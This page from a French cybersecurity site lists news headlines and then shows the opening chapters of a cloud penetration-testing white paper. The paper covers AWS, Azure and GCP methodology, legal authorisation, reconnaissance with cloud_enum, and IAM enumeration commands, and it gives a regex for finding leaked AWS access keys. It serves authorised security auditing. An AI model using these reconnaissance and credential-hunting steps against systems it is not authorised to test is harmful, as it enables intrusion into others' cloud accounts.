sites WordPress Microsoft Copilot réservé au divertissement selon ses propres CGU OpenAI propose une taxe robot et la semaine de quatre jours Rockstar Games piraté : ShinyHunters fixe un ultimatum au 14 avril Commission européenne piratée : 30 entités UE exposées Figure : près d'un million de comptes fintech piratés Operation Atlantic : arnaque crypto de 45 M$ démantelée REvil et GandCrab : la police allemande identifie les chefs Storm-1175 : Medusa ransomware déployé en moins de 24 heures CVE-2026-35616 : zero-day FortiClient EMS exploité activement Deux experts cybersécurité US plaident coupable pour des attaques BlackCat Anthropic atteint 30 milliards et signe un accord massif avec Google Microsoft prépare des datacenters blindés face aux frappes iraniennes Extensions IA : un angle mort critique pour la cybersécurité Axios compromis : Google accuse le groupe nord-coréen UNC1069 VENOM : la plateforme de phishing qui cible les dirigeants Massachusetts : un hôpital paralysé par une cyberattaque Ransomware ChipSoft : chaos dans les hôpitaux néerlandais CPUID piraté : CPU-Z et HWMonitor distribués avec un malware Microsoft intègre Security Copilot directement dans Defender Lapsus$ revendique le vol de données internes d'AstraZeneca EngageLab SDK : 50 millions d'utilisateurs Android exposés Shadow AI : la menace invisible qui échappe aux équipes sécurité Marimo : faille RCE critique exploitée 10 heures après sa publication Smart Slider 3 Pro : attaque supply chain via mise à jour piégée Adobe Reader : un zero-day exploité via PDF malveillants Bitcoin Depot : 3,6 millions de dollars en BTC volés Apache ActiveMQ : une faille RCE dormait depuis 13 ans npm : 36 faux plugins Strapi déploient des reverse shells CISA : patch d'urgence Ivanti EPMM avant le 11 avril Microsoft baisse les prix de Windows 365 de 20 % Corée du Nord : 1 700 paquets malveillants infiltrent npm et PyPI Uber mise sur les puces IA d'Amazon pour son cloud Fortinet : zero-day critique dans FortiClient EMS exploité Affinity : fuite de données après compromission d'un admin forum Faille UEFI critique : attaques pré-boot sur ASUS, MSI, Gigabyte Drift Protocol : 285 millions volés par des hackers nord-coréens Windows 11 : Microsoft corrige le bug du menu Démarrer OpenAI propose une taxe sur les robots et la semaine de 4 jours Claude Mythos : Anthropic traque des milliers de zero-days Sondage : les Américains adoptent l'IA mais n'y croient pas Ninja Forms WordPress : faille critique RCE exploitée L'Iran cible les automates industriels US via des attaques PLC Docker CVE-2026-34040 : contournement AuthZ et accès hôte FrostArmada : APT28 détourne des routeurs pour voler vos identifiants Storm-1175 : la Chine déploie Medusa via des zero-days Le Japon mise sur les robots IA face à la pénurie de travail Qilin ransomware frappe Die Linke, parti politique allemand L'Iran cible 300 organisations israéliennes via Microsoft 365 LiteLLM piégé : TeamPCP compromet 33 000 secrets via PyPI Google lance Eloquent, une app de dictée IA hors ligne Brightspeed enquête sur un vol de données d'un million de clients Flowise AI : faille CVSS 10 exploitée sur 12 000 serveurs FBI : des hackers chinois piratent le système de surveillance Chrome Zero-Day CVE-2026-5281 : faille WebGPU exploitée Microsoft lance trois modèles IA maison pour concurrencer OpenAI Aflac : 22,6 millions de victimes après une cyberattaque massive BlueHammer : un chercheur publie un zero-day Windows critique Microsoft force la mise à jour vers Windows 11 25H2 sur les PC non gérés Affinity : une fuite de données expose 175 000 utilisateurs du forum Axios npm piraté : la Corée du Nord derrière l attaque supply chain React2Shell : 766 serveurs Next.js compromis, credentials volés Drift Protocol : hack à 285 M$ attribué à la Corée du Nord Cisco IMC : faille critique CVSS 9.8 permet un accès admin NoVoice : un rootkit Android caché dans 50 apps du Play Store Apple étend iOS 18.7.7 pour contrer l'exploit DarkSword Fortinet : faille critique FortiClient EMS exploitée activement Slack déploie 30 fonctionnalités IA et devient un agent autonome Commission européenne hackée via Trivy : 30 entités UE exposées BrowserGate : LinkedIn scanne vos extensions de navigateur en secret CVE-2026-0625 : zero-day critique dans les routeurs D-Link EOL GlassWorm : 72 extensions Open VSX piégées ciblent les développeurs CVE-2026-5281 : zero-day Chrome WebGPU exploité activement Le CMA britannique lance une enquête sur les licences cloud Microsoft Google NotebookLM passe à Gemini 2.5 Flash pour le raisonnement OpenAI teste des Skills pour ChatGPT, inspirées de Claude Faille critique Fortinet CVE-2026-32756 : exploitation active Akira Ransomware cible les ESXi via une faille vCenter inédite Microsoft lance Copilot Security Agents pour automatiser le SOC Claude 4 Opus d Anthropic : benchmark et implications sécurité NIS 2 : Premières Sanctions ANSSI en France 2026 Rebellions lève 400 M$ pour défier Nvidia sur les puces IA Exchange Online : Microsoft peine à résoudre des pannes persistantes TridentLocker frappe Sedgwick, sous-traitant du gouvernement US Hims & Hers : ShinyHunters vole des millions de tickets Zendesk Qilin revendique le vol de données du parti allemand Die Linke Interlock exploite un zero-day Cisco FMC CVSS 10 depuis janvier SparkCat : un malware vole les cryptos depuis les stores mobiles Microsoft lance ses propres modèles IA pour défier OpenAI Fuite Claude Code : des dépôts GitHub piégés diffusent Vidar PTC Windchill : la police allemande réveille les admins GitHub Copilot entraîne ses IA sur vos données dès le 24 285 M$ volés en 12 minutes par des hackers nord-coréens 766 serveurs Next.js compromis par vol de credentials une faille CVSS 9.8 permet le reset des mots de passe admin Cisco corrige deux failles critiques CVSS 9.8 dans IMC et Le FBI alerte sur les risques des applications mobiles ShareFile : deux failles chaînées permettent une RCE sans NoVoice : un malware Android sur Google Play vole les un exploit kit iOS cible WebKit et le kernel Apple Microsoft alerte sur une campagne VBS avec bypass UAC TrueChaos : un APT chinois exploite TrueConf pour cibler Microsoft lance Copilot Wave 3 et Agent 365 pour l'ère UAC-0255 usurpe le CERT-UA et diffuse le RAT AGEWHEEZE Chrome : Google corrige un 4e zero-day exploité en 2026 L'Iran relance Pay2Key avec des pseudo-ransomwares TeamPCP compromet des environnements cloud via des Le CMA ouvre une enquête sur Microsoft pour ses licences VMware Aria Operations : RCE critique exploitée activement Cisco SD-WAN : un zero-day CVSS 10 exploité depuis trois ans Citrix NetScaler : faille critique CVSS 9.3 exploitée Databricks lance Lakewatch, un SIEM dopé à l'IA générative Microsoft enchaîne les correctifs d'urgence Windows en 2026 Axios piraté : un RAT distribué via npm à 100 millions CareCloud Breach : Dossiers Patients Exposés en 2026 le malware IA qui vole vos identifiants navigateur ChatGPT : une faille permettait l'exfiltration de données LexisNexis piraté : 400 000 profils cloud exposés via ShinyHunters vole 350 Go de données à la Commission Aflac notifie 22 millions de clients après une cyberattaque CTRL : toolkit RAT russe ciblant les entreprises via RDP macOS Tahoe 26.4 : Apple bloque les attaques ClickFix 10 561 failles détectées dans 1,2 million de commits GitHub : de fausses alertes VS Code propagent un malware Microsoft retire la mise à jour KB5079391 après des Le DoJ démantèle des botnets IoT derrière le DDoS record FortiGate : campagne active de vol de credentials ciblant CISA alerte sur une RCE exploitée, 24 700 instances exposées CVE-2026-20131 : Interlock exploite un zero-day Cisco FMC NIST renouvelle son guide de sécurité DNS après douze ans Handala pirate la messagerie du directeur du FBI Kash Patel Infinity Stealer : un nouveau malware cible macOS via Windows 11 : Microsoft publie un correctif d'urgence le fossé des compétences se creuse entre experts et novices Ubiquiti UniFi : faille CVSS 10 expose 29 000 équipements CVE-2026-21385 : Qualcomm corrige un zero-day Android CVE-2026-0625 : zero-day exploité sur routeurs D-Link Google corrige deux zero-days Skia et V8 exploités Mistral lance Voxtral TTS, modèle vocal open source à 4B GitHub lance la détection IA pour sécuriser le code source CVE-2026-3055 : Citrix NetScaler sous reconnaissance active Crunchyroll piraté : 6,8 millions de comptes compromis TeamPCP piège le SDK Telnyx sur PyPI via stéganographie WAV CVE-2025-53521 : F5 BIG-IP exploité, CISA exige un patch BlackCat : deux experts cybersécurité plaident coupable CVE-2026-32746 : RCE root non authentifié dans Telnetd APT28 exploite un 0-day MSHTML avant le Patch Tuesday Red Menshen : BPFDoor espionne les télécoms depuis 2021 Anthropic : la justice américaine bloque le ban de Trump Commission européenne : 350 Go volés via un cloud AWS Bearlyfy frappe 70 entreprises russes avec GenieLocker LangChain et LangGraph : trois failles critiques révélées PolyShell : 57 % des boutiques Magento vulnérables attaquées CVE-2026-33017 Langflow : RCE non authentifié exploité Qilin cible Malaysia Airlines : données passagers volées Conduent : brèche SafePay expose 25 millions d'Américains Mistral Small 4 : un seul modèle MoE remplace trois IA PolyShell : skimmer WebRTC vole 56 % des boutiques Magento CanisterWorm : TeamPCP infecte Trivy et 66 packages npm GlassWorm utilise Solana comme C2 pour son RAT furtif Medusa Ransomware : 9 jours hors-ligne pour un hôpital US Mandiant M-Trends 2026 : accès initial cédé en 22 secondes CVE-2026-20131 Cisco FMC : CVSS 10.0, hôpitaux visés CERTFR-2026-ALE-003 : ANSSI alerte sur les messageries Opération Checkmate : BlackSuit ransomware démantélé LiteLLM piraté : attaque supply chain PyPI TeamPCP EvilTokens PhaaS : 340 organisations M365 touchées Slopoly : Hive0163 déploie un malware généré par IA FCC interdit l'import de routeurs étrangers aux USA Silver Fox APT : espionnage et cybercrime ciblant l Asie Firefox 149 intègre un VPN gratuit et le Split View CVE-2026-32746 : RCE root non authentifié, GNU Telnetd CVE-2026-22557 Ubiquiti UniFi CVSS 10.0, 87 000 exposés TELUS Digital : ShinyHunters et le Vol de 1 PO de Data CVE-2025-32975 : Quest KACE SMA CVSS 10.0 exploité NVIDIA Agent Toolkit : IA autonome sécurisée en prod CVE-2026-3055 Citrix NetScaler : fuite de tokens SAML Crunchyroll confirme une fuite touchant 6,8 M d'utilisateurs Tycoon 2FA démantelé : Europol met fin au PhaaS MFA bypass TeamPCP étend son attaque supply chain à Checkmarx KICS CVE-2026-33017 Langflow : RCE exploité 20h après disclosure Stryker : le wiper iranien Handala détruit 80 000 terminaux Zero-Day CVSS 10.0 PTC Windchill : webshells en production Un hacker russe condamné à 81 mois pour ransomware La Corée du Nord piège les devs crypto via VS Code CMA UK : décision imminente contre AWS et Microsoft Moscou Usurpe Signal pour Cibler Officiels et Journalistes Microsoft Corrige en Urgence son Patch Tuesday Cassé GlassWorm Piège 72 Extensions VSCode pour Voler des Secrets PhantomRaven : Campagne npm Cible les Secrets CI/CD VMware Aria Operations CVE-2026-22719 : CISA KEV RCE Cisco FMC CVE-2026-20131 : Interlock RCE Root Actif DarkSword : exploit iOS zero-day ciblant les iPhones Le DoJ démantèle 4 botnets IoT au record de 31 Tbps n8n : 4 Failles RCE Critiques, 24 700 Serveurs Exposés Trivy : Attaque Supply Chain via GitHub Actions 2026 Meta : Agent IA Autonome Déclenche un Incident Critique Mistral Small 4 : Le Modèle Open Source 119B Tout-en-Un CVE-2026-21992 : Oracle Identity Manager RCE CVSS 9.8 Malaysia Airlines : le Groupe Quilin Exfiltre les Données Marquis Financial : 672 000 Victimes et Données Bancaires CVE-2025-68613 n8n : CISA KEV, 24 700 instances RCE exposées Navia Benefit Solutions : 2,7M dossiers santé exposés Opération Alice : 373 000 sites dark web démantelés CVE-2026-32746 : RCE Root dans GNU Telnetd CVSS 9.8 APT28 BadPaw et MeowMeow : Nouvelles Armes Contre l'Ukraine APT41 Silver Dragon : Espionnage via Google Drive C2 CVE-2026-20131 : Cisco FMC Zero-Day CVSS 10 Exploité CVE-2026-20963 SharePoint RCE Exploité : Alerte CISA KEV CVE-2026-33017 Langflow RCE : Exploité en Moins de 20h Iran-Handala : Wiper sur Stryker, FBI Saisit les Domaines CERT-FR : Messageries Instantanées Détournées Sans Malware TELUS Digital : ShinyHunters Vole 1 Pétaoctet de Données GLM-5 : Zhipu AI Lance un Modele 744B Parametres en 2026 Kali Linux 2025.4 : Passage a Wayland par Defaut en 2026 RSAC 2026 : Les Tendances Cybersécurité de l'Annee Patch Tuesday Fevrier 2026 : 4 Zero-Days Critiques Google Finalise l'Acquisition de Wiz pour 32 Milliards Gemini 3.1 Pro : 1 Million de Tokens en Contexte en 2026 Entra ID : Jailbreak de l'Authenticator Decouvert en 2026 FIRST Prevoit 50 000 CVE Publiees en 2026 : Guide Complet Entra ID : Migration Obligatoire vers DigiCert G2 en 2026 Anthropic Lance Cowork : Claude Sans Code pour Tous FCC Alerte : Ransomware Quadruple Depuis 2021 en 2026 Qilin Ransomware Domine le Paysage des Menaces Q1 2026 McDonald's India : Everest Ransomware Frappe Fort en 2026 CNIL France Travail : Sanction de 5 Millions EUR en 2026 CNIL : Free Mobile Sanctionne a 42 Millions EUR en 2026 Patch Tuesday Janvier 2026 : 112 CVE Corrigees en 2026 Microsoft Publie un Guide de Durcissement AD Complet Kali Linux 2025.3 : 15 Nouveaux Outils de Pentest en 2026 Cegedim Sante : 15 Millions de Patients Exposes en 2026 Kubernetes 1.35 : User Namespaces en Production en 2026 CNIL : Amende de 3,5M EUR pour Partage Illegal de Donnees SoundCloud et Inotiv : Double Fuite de Donnees en 2026 Leroy Merlin : Fuite de Donnees de 2 Millions de Clients GPT-5.2 : OpenAI Repousse les Limites a 400K Tokens React2Shell : RCE Critique CVSS 10 dans React Native BadSuccessor : Nouvelle Faille Critique Windows AD NIS 2 : l'Allemagne Adopte sa Loi de Transposition Shai-Hulud 2 : Supply Chain NPM Compromis a Grande Echelle Llama 4 Scout et Maverick : Meta Passe au Multimodal Microsoft Renforce la Protection CSP dans Entra ID Attaques Active Directory en Hausse de 42% en 2025 CVE-2025-20337 : RCE Critique dans Cisco ISE : Guide Complet Claude 4.5 : Anthropic Mise sur les Agents IA en 2026 Gemini 3 : Google Bat Tous les Benchmarks LLM en 2026 GPT-5.1 : OpenAI Lance son Modele le Plus Puissant ISO 27001:2022 : Fin de Transition en Octobre 2025 DoorDash : Fuite Massive via Social Engineering en 2026 OpenAI Renonce a l'Open Source pour ses Modeles IA SimonMed : Medusa Ransomware Expose 500K Patients en 2026 Ingénierie Sociale par IA : Menace Cyber n°1 en 2025 Failles de Sécurité Critiques Découvertes dans l'App Cisco Lance un Outil pour Sécuriser les Déploiements Faille Microsoft 365 Copilot Permet l'Exfiltration de Microsoft Déploie un Fix d'Urgence pour le Bug en 2026 Crimson Collective Exfiltre 12 To via F5 BIG-IP en 2026 Oracle EBS : Zero-Day RCE Exploite en Production en 2026 CVE-2025-64446 : Faille Critique FortiWeb CVSS 9.8

Livres Blancs

15 articles
Sécuriser Active Directory — Le Guide Complet (447 pages) Proxmox VE 9 — L'ouvrage complet : Guide IA Complet 2026 DFIR : Réponse à Incident et Forensics | Guide Expert Zero Trust : Architecture et Déploiement Entreprise Red Team vs Blue Team : Méthodologies et Outils Expert Sécurité Microsoft 365 : Audit et Durcissement Complet Guide Complet du Pentest Cloud : AWS, Azure et GCP Sécurité DevSecOps : Intégrer la Sécurité dans le CI/CD IA Offensive et Défensive en Cybersécurité | Guide 2025 Conformité ISO 27001 : Guide Pratique d'Implémentation Livre Blanc : Anatomie Attaque Ransomware — Guide Pratique Livre Blanc : Pentest Cloud AWS Azure GCP — Guide Pratique Livre Blanc : Sécurité Kubernetes — Guide Pratique Livre Blanc : Directive — Guide Expert 2026 Livre Blanc Détaillé : Guide Expert 2026

Consulting

15 articles
NIS2 : Directive UE 2022/2555 Cybersecurite (2026) AI Act 2026 : Reglement UE 2024/1689 sur l'IA — Guide Windows Internals : Structures Noyau et Exploitation ROI d un Audit de Sécurité : Chiffrer la Valeur pour le Comex Choisir son Prestataire Cybersécurité : 10 Critères Essentiels Exercice de gestion de crise cyber : scénarios et RETEX Politique de sécurité du SI : rédaction et déploiement Tableau de bord cybersécurité : KPIs pour le management Assurance cyber 2026 : critères, exclusions et conseils Gouvernance cybersécurité : rôle du RSSI et du COMEX Gestion des tiers et supply chain : évaluer les risques Budget cybersécurité : justifier vos investissements Plan de continuité d'activité PCA : conception et tests vCISO : Le Directeur Cybersécurité Externalisé pour PME Budget Cybersécurité PME : Guide d'Investissement et ROI

IAM et Gestion des Identités

14 articles
Microsoft Entra ID : Identité Cloud (ex-Azure AD) 2026 Arsenal Open Source : 50 Outils Sécurité Essentiels ITDR : détecter les menaces identitaires en temps réel PAM multi-cloud : gérer les accès privilégiés hybrides Passwordless : stratégie complète pour zéro mot de passe Sécuriser les comptes de service : rotation et vault SAML vs OIDC vs OAuth2 : choisir le bon protocole SSO RBAC, ABAC, PBAC : modèles de contrôle d’accès comparés MFA résistant au phishing : FIDO2, Passkeys et au-delà Identity Governance IGA : automatiser le cycle de vie Just-In-Time Access : élévation de privilèges contrôlée Zero Trust IAM : architecture centrée sur l’identité PAM : guide complet de gestion des accès à privilèges Sécuriser Entra ID : configuration avancée et pratiques

DevSecOps

14 articles
Checklists Sécurité — Audit & Durcissement
Formats disponibles
📄 PDF 📊 Excel 🌐 Web

11 checklists professionnelles couvrant 2 200+ points de contrôle. Téléchargement gratuit, aucune inscription.

Livre Blanc · Cybersécurité

Guide Complet du Pentest Cloud : AWS, Azure et GCP

Guide pentest cloud complet : methodologies d'audit AWS, Azure et GCP, outils specialises, techniques d'exploitation et remediation. Livre blanc.

AN
Ayi NEDJIMI
Expert Cybersécurité & IA
57
min lecture
PDF offert
FR
Français
LIVRE BLANC
Guide Complet du Pentest Cloud : AWS, Azure et GCP
Par Ayi NEDJIMI

✅ Version PDF offerte · Aucune inscription

Le cloud computing a radicalement transforme la surface d'attaque des entreprises. Avec plus de 94% des organisations utilisant au moins un service cloud en 2025, la sécurité de ces environnements est devenue un enjeu strategique majeur. Ce livre blanc propose un guide exhaustif du test d'intrusion cloud, couvrant les trois hyperscalers : Amazon Web Services (AWS), Microsoft Azure et Google Cloud Platform (GCP). Destine aux pentesters, red teamers, architectes sécurité et RSSI, il détaillé les methodologies, les techniques d'exploitation concretes et les outils indispensables pour evaluer la posture de sécurité d'une infrastructure cloud. Ce livre blanc expert de plus de 14 000 mots couvre l'ensemble des méthodologies d'audit cloud, des techniques de reconnaissance a la remediation. Destine aux pentesters, auditeurs sécurité et architectes cloud, il fournit un cadre operationnel complet avec des exemples pratiques pour AWS, Azure et GCP, base sur des retours d'experience de missions reelles.

  • Identification des vecteurs d'attaque et de la surface d'exposition
  • Stratégies de détection et de réponse aux incidents
  • Recommandations de durcissement et bonnes pratiques opérationnelles
  • Impact sur la conformité réglementaire (NIS2, DORA, RGPD)

Points cles

  • Le pentest cloud nécessite une méthodologie adaptee aux specificites de chaque fournisseur (AWS, Azure, GCP)
  • La gestion des identites et des acces (IAM) constitue le vecteur d'attaque principal dans 78% des compromissions cloud
  • Les services de metadonnees (IMDS) représentent un point d'entree critique exploitable via SSRF
  • Les outils specialises (ScoutSuite, Prowler, Pacu, ROADtools) automatisent la détection des mauvaises configurations
  • La remediation doit suivre les referentiels CIS Benchmarks et CSA Cloud Controls Matrix
  • Chaque hyperscaler possede ses propres vecteurs d'attaque et mécanismes de defense
  • La conformité (SOC 2, ISO 27017, SecNumCloud) encadre les exigences de sécurité cloud

Notre avis d'expert

Un livre blanc en cybersécurité n'a de valeur que s'il est actionnable. Les méthodologies théoriques sans exemples d'implémentation concrète restent lettre morte. Notre approche privilégie systématiquement les guides step-by-step validés en environnement de production.

Votre stratégie de cybersécurité repose-t-elle sur un référentiel méthodologique éprouvé ?

Chapitre 1 : Introduction au Pentest Cloud - Enjeux et Perimetre

Architecture du Pentest Cloud - Vue d'ensemble Pentester Perimetre d'audit defini AWS IAM, S3, EC2, Lambda Azure Entra ID, RBAC, Storage GCP IAM, GKE, Cloud Functions Rapport d'audit : vulnérabilités, risques, recommandations

1.1 Qu'est-ce que le pentest cloud ?

Le test d'intrusion cloud, communement appele pentest cloud, est une evaluation methodique et autorisee de la sécurité d'une infrastructure hebergee chez un fournisseur de services cloud. Contrairement au pentest traditionnel qui cible principalement des réseaux on-premise et des serveurs physiques, le pentest cloud doit prendre en compte un modele de responsabilite partagee, des API spécifiques a chaque fournisseur, et des services manages dont la surface d'attaque differe fondamentalement des systèmes classiques.

Le pentest cloud ne se limite pas a scanner des ports ou a tester des applications web hebergees dans le cloud. Il englobe l'evaluation de la configuration des services cloud natifs, l'analyse des politiques d'acces, la verification de l'isolation entre les tenants, et la recherche de chemins d'escalade de privileges au sein de l'infrastructure as code. Un auditeur competent doit maitriser les specificites de chaque fournisseur tout en conservant une vision transversale des risques communs.

Definition : Modele de responsabilite partagee

Le modele de responsabilite partagee definit la repartition des obligations de sécurité entre le fournisseur cloud (responsable de la sécurité du cloud, c'est-a-dire l'infrastructure physique, l'hyperviseur, le réseau) et le client (responsable de la sécurité dans le cloud, c'est-a-dire la configuration, les donnees, les acces). Ce modele varie selon le type de service : IaaS, PaaS ou SaaS. Plus le niveau d'abstraction est eleve, plus le fournisseur assume de responsabilites, mais le client conserve toujours la maitrise de ses donnees et de ses configurations d'acces.

Cas concret

Le framework MITRE ATT&CK, devenu le référentiel standard de l'industrie, a transformé la manière dont les organisations modélisent les menaces. Son adoption généralisée depuis 2020 a permis de structurer les échanges entre équipes offensives et défensives autour d'un langage commun et mesurable.

1.2 Pourquoi le pentest cloud est-il devenu indispensable ?

Les incidents de sécurité cloud se multiplient a un rythme alarmant. Selon le rapport 2025 de l'ENISA, 68% des violations de donnees impliquant des environnements cloud resultent de mauvaises configurations, et non d'exploits aboutis. Les buckets S3 publics, les roles IAM trop permissifs, les secrets stockes en clair dans les variables d'environnement : ces erreurs de configuration représentent autant de portes ouvertes pour un attaquant motive.

Le pentest cloud est devenu indispensable pour plusieurs raisons structurelles. Premierement, la complexite inherente aux environnements multi-cloud cree des angles morts que les outils automatises ne detectent pas toujours. Deuxiemement, la vitesse de déploiement des services cloud (infrastructure as code, CI/CD) introduit des risques de regression securitaire a chaque iteration. Troisiemement, les exigences reglementaires (RGPD, NIS2, DORA) imposent des evaluations regulieres de la posture de sécurité, y compris pour les actifs cloud.

Les statistiques parlent d'elles-memes : en 2024, le cout moyen d'une violation de donnees impliquant un environnement cloud s'elevait a 4,88 millions de dollars selon IBM. Les entreprises qui effectuent des pentests reguliers de leur infrastructure cloud reduisent ce risque de 40% en moyenne. Le retour sur investissement d'un audit de sécurité cloud est donc considerable lorsqu'on le compare au cout potentiel d'un incident.

Incidents cloud notables

En 2019, Capital One a subi une violation massive via une SSRF exploitant le service de metadonnees AWS (IMDS v1), compromettant les donnees de plus de 100 millions de clients. En 2023, Microsoft a revele qu'un groupe APT chinois (Storm-0558) avait exploite une cle de signature Azure AD volee pour acceder aux boites mail de hauts responsables gouvernementaux americains. En 2024, une mauvaise configuration Terraform exposant des credentials GCP a permis l'exfiltration de donnees sensibles chez un major de la sante europeenne. Ces incidents illustrent la diversite des vecteurs d'attaque cloud et la nécessite d'audits approfondis.

Vos guides de bonnes pratiques sont-ils lus et appliqués par les équipes opérationnelles ?

1.3 Perimetre et cadre legal du pentest cloud

Le perimetre d'un pentest cloud doit etre defini avec precision avant le debut de la mission. Contrairement au pentest traditionnel ou le scope se definit généralement par des plages d'adresses IP, le perimetre cloud s'articule autour de comptes, d'abonnements, de projets, de services spécifiques et de roles d'acces. documenter explicitement quels comptes cloud sont dans le scope, quels services peuvent etre testes, et quelles actions sont autorisees.

Chaque fournisseur cloud impose ses propres regles en matière de tests d'intrusion. AWS a simplifie sa politique en 2023 en supprimant l'obligation de notification prealable pour la plupart des tests, mais certaines activites restent interdites comme les tests DDoS, le DNS zone walking ou le flooding de ports. Azure requiert le respect des regles d'engagement documentees dans le Microsoft Cloud Penetration Testing Rules of Engagement, et les tests doivent se limiter aux ressources dont le client est proprietaire. GCP autorise les tests d'intrusion sur les ressources du client sans notification prealable, mais interdit toute action impactant les autres tenants.

Sur le plan legal, le pentest cloud s'inscrit dans le cadre general du droit applicable aux tests d'intrusion. En France, l'article 323-1 du Code penal punit l'acces frauduleux a un système de traitement automatise de donnees. Un contrat de mission detaille, signe par le responsable legal de l'organisation cliente, est donc indispensable. Ce contrat doit preciser le perimetre exact, les techniques autorisees, les horaires de test, les contacts d'urgence et les procedures d'escalade en cas de decouverte d'une vulnérabilité critique.

Attention : autorisations prealables

Ne commencez jamais un pentest cloud sans disposer d'une autorisation ecrite explicite du proprietaire du compte cloud. En environnement multi-tenant, une action mal ciblee peut impacter d'autres clients du fournisseur. Verifiez systematiquement que vos credentials de test sont limites au perimetre autorise. Conservez des logs detailles de toutes vos actions pour pouvoir justifier chaque operation en cas de contestation. Le non-respect de ces precautions peut entrainer des poursuites penales et la responsabilite civile du pentester et de son employeur.

1.4 Differences fondamentales avec le pentest traditionnel

Le pentest cloud se distingue du pentest traditionnel sur plusieurs aspects fondamentaux. Le premier est l'absence de couche réseau physique directement accessible. Dans un environnement cloud, le pentester interagit principalement avec des API, des consoles web et des services manages, plutot qu'avec des equipements réseau physiques. Les techniques classiques de sniffing réseau ou d'ARP spoofing sont généralement inapplicables.

Le deuxieme aspect distinctif est la preponderance de la gestion des identites et des acces (IAM) comme vecteur d'attaque principal. Dans un environnement cloud, la quasi-totalite des actions passent par des mécanismes d'authentification et d'autorisation bases sur des politiques IAM. Comprendre et exploiter les failles de ces politiques constitue le coeur du pentest cloud. Un role IAM mal configure peut donner acces a l'integralite d'un compte cloud, sans qu'aucune vulnérabilité technique classique ne soit exploitee.

Le troisieme aspect concerne la nature ephemere et dynamique des ressources cloud. Les instances sont creees et detruites en permanence via l'infrastructure as code. Les conteneurs ont une duree de vie de quelques minutes. Les fonctions serverless s'executent pendant quelques secondes. Le pentester doit adapter sa méthodologie a cette realite en privilegiant l'analyse des configurations et des politiques plutot que la recherche de vulnérabilités sur des systèmes spécifiques qui peuvent disparaitre a tout moment.

Enfin, le quatrieme aspect est la richesse des services manages proposes par chaque fournisseur. AWS propose plus de 200 services, Azure plus de 300, et GCP plus de 150. Chaque service possede ses propres mécanismes de sécurité, ses propres risques de mauvaise configuration et ses propres vecteurs d'attaque. Un pentester cloud doit donc maintenir une connaissance actualisee d'un écosystème en perpetuelle evolution.

CriterePentest traditionnelPentest cloud
Surface d'attaqueRéseau, OS, applicationsAPI, IAM, services manages, configurations
Acces initialScan de ports, exploitation de servicesCredentials volees, mauvaises configurations IAM
Mouvement lateralPivoting réseau, pass-the-hashEscalade de privileges IAM, cross-account access
PersistenceBackdoors, rootkitsCles d'acces, roles federees, Lambda backdoors
ExfiltrationTunnels DNS, canaux covertsBuckets publics, snapshots partages, API endpoints
Outils principauxNmap, Metasploit, Burp SuiteScoutSuite, Prowler, Pacu, ROADtools
Cadre legalAutorisation du proprietaireAutorisation + respect des politiques du CSP

Chapitre 2 : Méthodologie de Test d'Intrusion Cloud

Phases du Pentest Cloud Phase 1 Reconnaissance Phase 2 Enumeration Phase 3 Exploitation Phase 4 Post-Exploitation Phase 5 Reporting OSINT DNS, certificats GitHub leaks Shodan, Censys S3 discovery Services IAM policies Storage access Network config Secrets exposed Attaques Privesc IAM SSRF/IMDS Data exfil Lateral move Persistence Backdoor keys Shadow admin Cross-account Log evasion Delivrables Vulnérabilités Preuves Remediations Score de risque

2.1 Phase de reconnaissance (OSINT cloud)

La reconnaissance constitue la premiere phase de tout pentest cloud. Elle vise a collecter un maximum d'informations sur l'infrastructure cible sans interagir directement avec les systèmes audites. En contexte cloud, cette phase présente des specificites importantes liees a la nature des services et a leur exposition sur Internet.

La decouverte de buckets S3 et d'espaces de stockage publics représente souvent le point de depart de la reconnaissance cloud. Des outils comme cloud_enum permettent de decouvrir des ressources de stockage exposees en testant des variations de noms bases sur le domaine de la cible. La commande typique est la suivante :

python3 cloud_enum.py -k entreprise-cible -k entreprisecible --disable-gcp

Les certificats SSL/TLS constituent une source precieuse d'informations. Le Certificate Transparency Log permet de decouvrir des sous-domaines associes a l'infrastructure cloud de la cible. L'outil crt.sh ou des requetes directes sur les logs CT revelent souvent des noms de domaine pointant vers des services cloud (par exemple *.s3.amazonaws.com, *.blob.core.windows.net, *.storage.googleapis.com).

La recherche de fuites de credentials sur les depots de code publics est une étape critique. GitHub, GitLab et Bitbucket regorgent de cles d'acces AWS, de secrets Azure ou de fichiers de credentials GCP commites accidentellement. Des outils comme truffleHog, gitleaks ou git-secrets permettent d'automatiser cette recherche. Les expressions regulieres a cibler incluent les patterns de cles d'acces AWS (AKIA[0-9A-Z]{16}), les connection strings Azure et les fichiers de service account GCP au format JSON.

Shodan et Censys permettent de cartographier les services cloud exposes. Les requetes spécifiques comme org:"Amazon.com" ou cloud.provider:azure sur Censys permettent d'identifier les assets de la cible heberges chez chaque fournisseur. Les headers HTTP revelent souvent le fournisseur cloud utilise (par exemple x-amz-request-id pour AWS, x-ms-request-id pour Azure).

L'analyse DNS revele la cartographie cloud de la cible. Les enregistrements CNAME pointant vers des services cloud (*.amazonaws.com, *.azurewebsites.net, *.appspot.com) permettent d'identifier les services utilises. La recherche de subdomain takeover est particulierement pertinente en contexte cloud : un enregistrement DNS pointant vers un service cloud supprime peut etre reclame par un attaquant.

Outils de reconnaissance cloud

Les outils essentiels pour la phase de reconnaissance incluent : cloud_enum pour la decouverte de ressources de stockage, dnsrecon et subfinder pour l'enumeration DNS, truffleHog et gitleaks pour la détection de secrets dans les depots de code, Shodan et Censys pour la cartographie des services exposes, et waybackurls pour l'analyse historique des URLs. Combinez ces outils pour obtenir une vision complete de la surface d'attaque cloud de la cible.

2.2 Phase d'enumeration des services cloud

Une fois la reconnaissance passive terminee, la phase d'enumeration consiste a interagir directement avec les services cloud identifies pour cartographier les ressources, les configurations et les permissions. Cette phase nécessite généralement des credentials valides, qu'ils aient ete fournis dans le cadre d'un test en boite grise ou obtenus lors de la phase de reconnaissance.

L'enumeration IAM est la premiere étape. Pour AWS, la commande aws sts get-caller-identity permet de verifier l'identite associee aux credentials obtenus. Ensuite, aws iam list-users, aws iam list-roles et aws iam list-policies cartographient les entites IAM du compte. L'analyse des politiques attachees a chaque entite revele les permissions effectives et les chemins d'escalade potentiels.

Pour Azure, l'enumeration commence par az account list pour identifier les abonnements accessibles, puis az ad user list et az role assignment list pour cartographier les identites et les attributions de roles. L'outil ROADtools de Dirk-jan Mollema automatise cette enumeration en collectant l'integralite du graphe Azure AD (desormais Entra ID) via l'API Microsoft Graph.

